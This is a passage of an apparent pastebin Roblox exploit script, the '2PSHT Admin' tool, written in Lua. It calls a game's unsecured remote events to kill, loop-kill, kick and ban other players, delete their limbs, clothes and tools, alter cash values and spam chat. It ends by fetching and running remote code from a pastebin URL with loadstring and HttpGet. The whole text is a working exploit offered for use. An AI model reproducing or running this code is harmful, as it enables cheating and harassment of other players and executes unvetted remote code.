  1515. Command63 = playersService[v].Chatted:Connect(function(msg)
  1516. if msg:lower():sub(1,6+Prefix:len()) == Prefix.."rhats " then
  1517. for i,v in pairs(GetPlayer(string.sub(msg,7+Prefix:len()))) do
  1518. for x,o in pairs(playersService[v].Character:GetChildren()) do
  1519. if o:IsA("Accessory") then
  1520. replicatedStorage.events.destroyObject:FireServer(o)
  1521. end
  1522. end
  1523. end
  1524. end
  1525. end)
  1526.  
  1527. Command64 = playersService[v].Chatted:Connect(function(msg)
  1528. if msg:lower():sub(1,11+Prefix:len()) == Prefix.."removehats " then
  1529. for i,v in pairs(GetPlayer(string.sub(msg,12+Prefix:len()))) do
  1530. for x,o in pairs(playersService[v].Character:GetChildren()) do
  1531. if o:IsA("Accessory") then
  1532. replicatedStorage.events.destroyObject:FireServer(o)
  1533. end
  1534. end
  1535. end
  1536. end
  1537. end)
  1538.  
  1539. Command65 = playersService[v].Chatted:Connect(function(msg)
  1540. if msg:lower():sub(1,8+Prefix:len()) == Prefix.."creeper " then
  1541. for i,v in pairs(GetPlayer(string.sub(msg,9+Prefix:len()))) do
  1542. if playersService[v].Character.Head:FindFirstChild("Mesh") then
  1543. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character.Head.Mesh)
  1544. end
  1545. if playersService[v].Character:FindFirstChild("Left Arm") then
  1546. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Left Arm"])
  1547. end
  1548. if playersService[v].Character:FindFirstChild("Right Arm") then
  1549. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Right Arm"])
  1550. end
  1551. end
  1552. end
  1553. end)
  1554.  
  1555. Command66 = playersService[v].Chatted:Connect(function(msg)
  1556. if msg:lower():sub(1,8+Prefix:len()) == Prefix.."toolban " then
  1557. for i,v in pairs(GetPlayer(string.sub(msg,9+Prefix:len()))) do
  1558. table.insert(toolbanned,playersService[v].Name)
  1559. end
  1560. end
  1561. end)
  1562.  
  1563. Command67 = playersService[v].Chatted:Connect(function(msg)
  1564. if msg:lower():sub(1,10+Prefix:len()) == Prefix.."untoolban " then
  1565. for i,v in pairs(GetPlayer(string.sub(msg,11+Prefix:len()))) do
  1566. for j,k in pairs(toolbanned) do
  1567. if string.match(k,v) then
  1568. table.remove(toolbanned,j)
  1569. end
  1570. end
  1571. end
  1572. end
  1573. end)
  1574.  
  1575. end
  1576. end
  1577. end
  1578.  
  1579. createCommand:Connect(function(msg)
  1580. if msg:lower():sub(1,8+Prefix:len()) == Prefix.."unadmin " then
  1581. for i,v in pairs(GetPlayer(string.sub(msg,9+Prefix:len()))) do
  1582. for j,k in pairs(administrators) do
  1583. if string.match(k,v) then
  1584. table.remove(administrators,j)
  1585. Command39:Disconnect()
  1586. Command40:Disconnect()
  1587. Command41:Disconnect()
  1588. Command42:Disconnect()
  1589. Command43:Disconnect()
  1590. Command44:Disconnect()
  1591. Command45:Disconnect()
  1592. Command46:Disconnect()
  1593. Command47:Disconnect()
  1594. Command48:Disconnect()
  1595. Command49:Disconnect()
  1596. Command50:Disconnect()
  1597. Command51:Disconnect()
  1598. Command52:Disconnect()
  1599. Command53:Disconnect()
  1600. Command54:Disconnect()
  1601. Command55:Disconnect()
  1602. Command56:Disconnect()
  1603. Command57:Disconnect()
  1604. Command58:Disconnect()
  1605. Command59:Disconnect()
  1606. Command60:Disconnect()
  1607. Command61:Disconnect()
  1608. Command62:Disconnect()
  1609. Command63:Disconnect()
  1610. Command64:Disconnect()
  1611. Command65:Disconnect()
  1612. Command66:Disconnect()
  1613. Command67:Disconnect()
  1614. end
  1615. end
  1616. end
  1617. end
  1618. end)
  1619. end)
  1620.  
  1621. createCommand:Connect(function(msg)
  1622. if msg:lower():sub(1,14+Prefix:len()) == Prefix.."administrator " then
  1623. for i,v in pairs(GetPlayer(string.sub(msg,15+Prefix:len()))) do
  1624. table.insert(administrators,playersService[v].Name)
  1625. Uctron.SoundFX._notification1:Play()
  1626. starterGui:SetCore("SendNotification", {
  1627. Title = "2PSHT Admin | Success";
  1628. Text = "Administrator powers given to \""..v.."\".";
  1629. Icon = "rbxassetid://4595715410";
  1630. Duration = 15;
  1631. Button1 = "Okay";
  1632. })
  1633. Command68 = playersService[v].Chatted:Connect(function(msg)
  1634. if msg:lower():sub(1,7+Prefix:len()) == Prefix.."punish " then
  1635. for i,v in pairs(GetPlayer(string.sub(msg,8+Prefix:len()))) do
  1636. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character)
  1637. end
  1638. end
  1639. end)
  1640.  
  1641. Command69 = playersService[v].Chatted:Connect(function(msg)
  1642. if msg:lower():sub(1,8+Prefix:len()) == Prefix.."ragdoll " then
  1643. for i,v in pairs(GetPlayer(string.sub(msg,9+Prefix:len()))) do
  1644. if playersService[v].Character:FindFirstChild("Humanoid") then
  1645. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character.Humanoid)
  1646. end
  1647. end
  1648. end
  1649. end)
  1650.  
  1651. Command70 = playersService[v].Chatted:Connect(function(msg)
  1652. if msg:lower():sub(1,5+Prefix:len()) == Prefix.."kick " then
  1653. for i,v in pairs(GetPlayer(string.sub(msg,6+Prefix:len()))) do
  1654. if playersService:FindFirstChild(v) then
  1655. replicatedStorage.events.destroyObject:FireServer(playersService[v])
  1656. end
  1657. end
  1658. end
  1659. end)
  1660.  
  1661. Command71 = playersService[v].Chatted:Connect(function(msg)
  1662. if msg:lower():sub(1,4+Prefix:len()) == Prefix.."ban " then
  1663. for i,v in pairs(GetPlayer(string.sub(msg,5+Prefix:len()))) do
  1664. table.insert(banned,playersService[v].Name)
  1665. end
  1666. end
  1667. end)
  1668.  
  1669. Command72 = playersService[v].Chatted:Connect(function(msg)
  1670. if msg:lower():sub(1,6+Prefix:len()) == Prefix.."unban " then
  1671. for i,v in pairs(GetPlayer(string.sub(msg,7+Prefix:len()))) do
  1672. for j,k in pairs(banned) do
  1673. if string.match(k,v) then
  1674. table.remove(banned,j)
  1675. end
  1676. end
  1677. end
  1678. end
  1679. end)
  1680.  
  1681. Comman73 = playersService[v].Chatted:Connect(function(msg)
  1682. if msg:lower():sub(1,3+Prefix:len()) == Prefix.."cm " then
  1683. local ChatMessage = msg:sub(4+Prefix:len(), #msg)
  1684. replicatedStorage.Events.changeValue:InvokeServer(Uctron.Data._localPlayer.Shouts, 1e10)
  1685. replicatedStorage.Events.Shout:InvokeServer(string.rep("\n",53)..ChatMessage)
  1686. end
  1687. end)
  1688.  
  1689. Command74 = playersService[v].Chatted:Connect(function(msg)
  1690. if msg:lower():sub(1,9+Prefix:len()) == Prefix.."cmessage " then
  1691. local ChatMessage = msg:sub(10+Prefix:len(), #msg)
  1692. replicatedStorage.Events.changeValue:InvokeServer(Uctron.Data._localPlayer.Shouts, 1e10)
  1693. replicatedStorage.Events.Shout:InvokeServer(string.rep("\n",53)..ChatMessage)
  1694. end
  1695. end)
  1696.  
  1697. Command75 = playersService[v].Chatted:Connect(function(msg)
  1698. if msg:lower():sub(1,12+Prefix:len()) == Prefix.."chatmessage " then
  1699. local ChatMessage = msg:sub(13+Prefix:len(), #msg)
  1700. replicatedStorage.Events.changeValue:InvokeServer(Uctron.Data._localPlayer.Shouts, 1e10)
  1701. replicatedStorage.Events.Shout:InvokeServer(string.rep("\n",53)..ChatMessage)
  1702. end
  1703. end)
  1704.  
  1705. Command76 = playersService[v].Chatted:Connect(function(msg)
  1706. if msg:lower():sub(1,9+Prefix:len()) == Prefix.."loopkill " then
  1707. for i,v in pairs(GetPlayer(string.sub(msg,10+Prefix:len()))) do
  1708. table.insert(loopkilled,playersService[v].Name)
  1709. end
  1710. end
  1711. end)
  1712.  
  1713. Command77 = playersService[v].Chatted:Connect(function(msg)
  1714. if msg:lower():sub(1,11+Prefix:len()) == Prefix.."unloopkill " then
  1715. for i,v in pairs(GetPlayer(string.sub(msg,12+Prefix:len()))) do
  1716. for j,k in pairs(loopkilled) do
  1717. if string.match(k,v) then
  1718. table.remove(loopkilled,j)
  1719. end
  1720. end
  1721. end
  1722. end
  1723. end)
  1724.  
  1725. Command78 = playersService[v].Chatted:Connect(function(msg)
  1726. if msg:lower():sub(1,5+Prefix:len()) == Prefix.."kill " then
  1727. for i,v in pairs(GetPlayer(string.sub(msg,6+Prefix:len()))) do
  1728. if playersService[v].Character.Torso:FindFirstChild("Neck") then
  1729. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character.Torso.Neck)
  1730. end
  1731. runService.RenderStepped:Wait()
  1732. end
  1733. end
  1734. end)
  1735.  
  1736. Command79 = playersService[v].Chatted:Connect(function(msg)
  1737. if msg:lower():sub(1,5+Prefix:len()) == Prefix.."cash " then
  1738. for i,v in pairs(GetPlayer(string.split(msg, " ")[2])) do
  1739. b = string.split(msg, " ")[3]
  1740. game:GetService("ReplicatedStorage").Events.changeValue:InvokeServer(game:GetService('ReplicatedStorage').plrData[v].cash, b)
  1741. end
  1742. end
  1743. end)
  1744.  
  1745. Command80 = playersService[v].Chatted:Connect(function(msg)
  1746. if msg:lower():sub(1,10+Prefix:len()) == Prefix.."unpackage " then
  1747. for i,v in pairs(GetPlayer(string.sub(msg,11+Prefix:len()))) do
  1748. for x,o in pairs(playersService[v].Character:GetChildren()) do
  1749. if o:IsA("CharacterMesh") then
  1750. replicatedStorage.events.destroyObject:FireServer(o)
  1751. end
  1752. end
  1753. end
  1754. end
  1755. end)
  1756.  
  1757. Command81 = playersService[v].Chatted:Connect(function(msg)
  1758. if msg:lower():sub(1,7+Prefix:len()) == Prefix.."rlimbs " then
  1759. for i,v in pairs(GetPlayer(string.sub(msg,8+Prefix:len()))) do
  1760. if playersService[v].Character:FindFirstChild("Left Arm") then
  1761. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Left Arm"])
  1762. end
  1763. if playersService[v].Character:FindFirstChild("Right Arm") then
  1764. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Right Arm"])
  1765. end
  1766. if playersService[v].Character:FindFirstChild("Left Leg") then
  1767. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Left Leg"])
  1768. end
  1769. if playersService[v].Character:FindFirstChild("Right Leg") then
  1770. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Right Leg"])
  1771. end
  1772. end
  1773. end
  1774. end)
  1775.  
  1776. Command82 = playersService[v].Chatted:Connect(function(msg)
  1777. if msg:lower():sub(1,12+Prefix:len()) == Prefix.."removelimbs " then
  1778. for i,v in pairs(GetPlayer(string.sub(msg,13+Prefix:len()))) do
  1779. if playersService[v].Character:FindFirstChild("Left Arm") then
  1780. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Left Arm"])
  1781. end
  1782. if playersService[v].Character:FindFirstChild("Right Arm") then
  1783. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Right Arm"])
  1784. end
  1785. if playersService[v].Character:FindFirstChild("Left Leg") then
  1786. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Left Leg"])
  1787. end
  1788. if playersService[v].Character:FindFirstChild("Right Leg") then
  1789. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Right Leg"])
  1790. end
  1791. end
  1792. end
  1793. end)
  1794.  
  1795. Command83 = playersService[v].Chatted:Connect(function(msg)
  1796. if msg:lower():sub(1,6+Prefix:len()) == Prefix.."rarms " then
  1797. for i,v in pairs(GetPlayer(string.sub(msg,7+Prefix:len()))) do
  1798. if playersService[v].Character:FindFirstChild("Left Arm") then
  1799. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Left Arm"])
  1800. end
  1801. if playersService[v].Character:FindFirstChild("Left Arm") then
  1802. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Right Arm"])
  1803. end
  1804. end
  1805. end
  1806. end)
  1807.  
  1808. Command84 = playersService[v].Chatted:Connect(function(msg)
  1809. if msg:lower():sub(1,11+Prefix:len()) == Prefix.."removearms " then
  1810. for i,v in pairs(GetPlayer(string.sub(msg,12+Prefix:len()))) do
  1811. if playersService[v].Character:FindFirstChild("Left Arm") then
  1812. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Left Arm"])
  1813. end
  1814. if playersService[v].Character:FindFirstChild("Left Arm") then
  1815. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Right Arm"])
  1816. end
  1817. end
  1818. end
  1819. end)
  1820.  
  1821. Command85 = playersService[v].Chatted:Connect(function(msg)
  1822. if msg:lower():sub(1,6+Prefix:len()) == Prefix.."rlegs " then
  1823. for i,v in pairs(GetPlayer(string.sub(msg,7+Prefix:len()))) do
  1824. if playersService[v].Character:FindFirstChild("Left Leg") then
  1825. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Left Leg"])
  1826. end
  1827. if playersService[v].Character:FindFirstChild("Right Leg") then
  1828. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Right Leg"])
  1829. end
  1830. end
  1831. end
  1832. end)
  1833.  
  1834. Command86 = playersService[v].Chatted:Connect(function(msg)
  1835. if msg:lower():sub(1,11+Prefix:len()) == Prefix.."removelegs " then
  1836. for i,v in pairs(GetPlayer(string.sub(msg,12+Prefix:len()))) do
  1837. if playersService[v].Character:FindFirstChild("Left Leg") then
  1838. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Left Leg"])
  1839. end
  1840. if playersService[v].Character:FindFirstChild("Right Leg") then
  1841. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Right Leg"])
  1842. end
  1843. end
  1844. end
  1845. end)
  1846.  
  1847. Command87 = playersService[v].Chatted:Connect(function(msg)
  1848. if msg:lower():sub(1,6+Prefix:len()) == Prefix.."naked " then
  1849. for i,v in pairs(GetPlayer(string.sub(msg,7+Prefix:len()))) do
  1850. if playersService[v].Character:FindFirstChild("Shirt") then
  1851. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character.Shirt)
  1852. else
  1853. end
  1854. if playersService[v].Character:FindFirstChild("Pants") then
  1855. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character.Pants)
  1856. else
  1857. end
  1858. if playersService[v].Character:FindFirstChild("Shirt Graphic") then
  1859. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Shirt Graphic"])
  1860. else
  1861. end
  1862. end
  1863. end
  1864. end)
  1865.  
  1866. Command88 = playersService[v].Chatted:Connect(function(msg)
  1867. if msg:lower():sub(1,7+Prefix:len()) == Prefix.."nayked " then
  1868. for i,v in pairs(GetPlayer(string.sub(msg,8+Prefix:len()))) do
  1869. if playersService[v].Character:FindFirstChild("Shirt") then
  1870. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character.Shirt)
  1871. else
  1872. end
  1873. if playersService[v].Character:FindFirstChild("Pants") then
  1874. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character.Pants)
  1875. else
  1876. end
  1877. if playersService[v].Character:FindFirstChild("Shirt Graphic") then
  1878. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Shirt Graphic"])
  1879. else
  1880. end
  1881. end
  1882. end
  1883. end)
  1884.  
  1885. Command89 = playersService[v].Chatted:Connect(function(msg)
  1886. if msg:lower():sub(1,9+Prefix:len()) == Prefix.."faceless " then
  1887. for i,v in pairs(GetPlayer(string.sub(msg,10+Prefix:len()))) do
  1888. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character.Head:FindFirstChildOfClass("Decal"))
  1889. end
  1890. end
  1891. end)
  1892.  
  1893. Command90 = playersService[v].Chatted:Connect(function(msg)
  1894. if msg:lower():sub(1,6+Prefix:len()) == Prefix.."rface " then
  1895. for i,v in pairs(GetPlayer(string.sub(msg,7+Prefix:len()))) do
  1896. if Uctron.Data._localPlayer.Character.Head:FindFirstChild("face") then
  1897. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character.Head:FindFirstChildOfClass("Decal"))
  1898. end
  1899. end
  1900. end
  1901. end)
  1902.  
  1903. Command91 = playersService[v].Chatted:Connect(function(msg)
  1904. if msg:lower():sub(1,11+Prefix:len()) == Prefix.."removeface " then
  1905. for i,v in pairs(GetPlayer(string.sub(msg,12+Prefix:len()))) do
  1906. if Uctron.Data._localPlayer.Character.Head:FindFirstChild("face") then
  1907. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character.Head:FindFirstChildOfClass("Decal"))
  1908. end
  1909. end
  1910. end
  1911. end)
  1912.  
  1913. Command92 = playersService[v].Chatted:Connect(function(msg)
  1914. if msg:lower():sub(1,6+Prefix:len()) == Prefix.."rhats " then
  1915. for i,v in pairs(GetPlayer(string.sub(msg,7+Prefix:len()))) do
  1916. for x,o in pairs(playersService[v].Character:GetChildren()) do
  1917. if o:IsA("Accessory") then
  1918. replicatedStorage.events.destroyObject:FireServer(o)
  1919. end
  1920. end
  1921. end
  1922. end
  1923. end)
  1924.  
  1925. Command93 = playersService[v].Chatted:Connect(function(msg)
  1926. if msg:lower():sub(1,11+Prefix:len()) == Prefix.."removehats " then
  1927. for i,v in pairs(GetPlayer(string.sub(msg,12+Prefix:len()))) do
  1928. for x,o in pairs(playersService[v].Character:GetChildren()) do
  1929. if o:IsA("Accessory") then
  1930. replicatedStorage.events.destroyObject:FireServer(o)
  1931. end
  1932. end
  1933. end
  1934. end
  1935. end)
  1936.  
  1937. Command94 = playersService[v].Chatted:Connect(function(msg)
  1938. if msg:lower():sub(1,8+Prefix:len()) == Prefix.."creeper " then
  1939. for i,v in pairs(GetPlayer(string.sub(msg,9+Prefix:len()))) do
  1940. if playersService[v].Character.Head:FindFirstChild("Mesh") then
  1941. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character.Head.Mesh)
  1942. end
  1943. if playersService[v].Character:FindFirstChild("Left Arm") then
  1944. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Left Arm"])
  1945. end
  1946. if playersService[v].Character:FindFirstChild("Right Arm") then
  1947. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Right Arm"])
  1948. end
  1949. end
  1950. end
  1951. end)
  1952.  
  1953. Command95 = playersService[v].Chatted:Connect(function(msg)
  1954. if msg:lower():sub(1,8+Prefix:len()) == Prefix.."toolban " then
  1955. for i,v in pairs(GetPlayer(string.sub(msg,9+Prefix:len()))) do
  1956. table.insert(toolbanned,playersService[v].Name)
  1957. end
  1958. end
  1959. end)
  1960.  
  1961. Command96 = playersService[v].Chatted:Connect(function(msg)
  1962. if msg:lower():sub(1,10+Prefix:len()) == Prefix.."untoolban " then
  1963. for i,v in pairs(GetPlayer(string.sub(msg,11+Prefix:len()))) do
  1964. for j,k in pairs(toolbanned) do
  1965. if string.match(k,v) then
  1966. table.remove(toolbanned,j)
  1967. end
  1968. end
  1969. end
  1970. end
  1971. end)
  1972.  
  1973. end
  1974. end
  1975. end)
  1976.  
  1977. createCommand:Connect(function(msg)
  1978. if msg:lower():sub(1,16+Prefix:len()) == Prefix.."unadministrator " then
  1979. for i,v in pairs(GetPlayer(string.sub(msg,17+Prefix:len()))) do
  1980. for j,k in pairs(administrators) do
  1981. if string.match(k,v) then
  1982. table.remove(administrators,j)
  1983. Command68 = playersService[v].Chatted:Disconnect()
  1984. Command69 = playersService[v].Chatted:Disconnect()
  1985. Command70 = playersService[v].Chatted:Disconnect()
  1986. Command71 = playersService[v].Chatted:Disconnect()
  1987. Command72 = playersService[v].Chatted:Disconnect()
  1988. Command73 = playersService[v].Chatted:Disconnect()
  1989. Command74 = playersService[v].Chatted:Disconnect()
  1990. Command75 = playersService[v].Chatted:Disconnect()
  1991. Command76 = playersService[v].Chatted:Disconnect()
  1992. Command77 = playersService[v].Chatted:Disconnect()
  1993. Command78 = playersService[v].Chatted:Disconnect()
  1994. Command79 = playersService[v].Chatted:Disconnect()
  1995. Command80 = playersService[v].Chatted:Disconnect()
  1996. Command81 = playersService[v].Chatted:Disconnect()
  1997. Command82 = playersService[v].Chatted:Disconnect()
  1998. Command83 = playersService[v].Chatted:Disconnect()
  1999. Command84 = playersService[v].Chatted:Disconnect()
  2000. Command85 = playersService[v].Chatted:Disconnect()
  2001. Command86 = playersService[v].Chatted:Disconnect()
  2002. Command87 = playersService[v].Chatted:Disconnect()
  2003. Command88 = playersService[v].Chatted:Disconnect()
  2004. Command89 = playersService[v].Chatted:Disconnect()
  2005. Command90 = playersService[v].Chatted:Disconnect()
  2006. Command91 = playersService[v].Chatted:Disconnect()
  2007. Command92 = playersService[v].Chatted:Disconnect()
  2008. Command93 = playersService[v].Chatted:Disconnect()
  2009. Command94 = playersService[v].Chatted:Disconnect()
  2010. Command95 = playersService[v].Chatted:Disconnect()
  2011. Command96 = playersService[v].Chatted:Disconnect()
  2012. end
  2013. end
  2014. end
  2015. end
  2016. end)
  2017.  
  2018. function Ban()
  2019. for i,v in pairs(banned) do
  2020. if playersService:FindFirstChild(v) then
  2021. replicatedStorage.events.destroyObject:FireServer(playersService[v])
  2022. end
  2023. end
  2024. end
  2025.  
  2026. function Loopkill()
  2027. for i,v in pairs(loopkilled) do
  2028. if playersService:FindFirstChild(v) then
  2029. torso = playersService[v].Character:FindFirstChild("Torso")
  2030. if torso then
  2031. neck = torso:FindFirstChild("Neck")
  2032. if neck then
  2033. replicatedStorage.events.destroyObject:FireServer(neck)
  2034. end
  2035. end
  2036. end
  2037. end
  2038. end
  2039.  
  2040. function Toolban()
  2041. for i,v in pairs(toolbanned) do
  2042. if playersService:FindFirstChild(v) then
  2043. for j,k in pairs(playersService[v].Backpack:GetChildren()) do
  2044. replicatedStorage.events.destroyObject:FireServer(k)
  2045. end
  2046. for j,k in pairs(playersService[v].Character:GetChildren()) do
  2047. if k:IsA("Tool") then
  2048. replicatedStorage.events.destroyObject:FireServer(k)
  2049. end
  2050. end
  2051. end
  2052. end
  2053. end
  2054.  
  2055. runService.Heartbeat:Connect(Ban)
  2056. runService.Heartbeat:Connect(Loopkill)
  2057. runService.Heartbeat:Connect(Toolban)
  2058.  
  2059. coroutine.resume(coroutine.create(function()
  2060. loadstring(game:HttpGet(("https://pastebin.com/raw/VVR2at1L"),true))()
  2061. end))
  2062. Uctron.SoundFX._notification1:Play()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement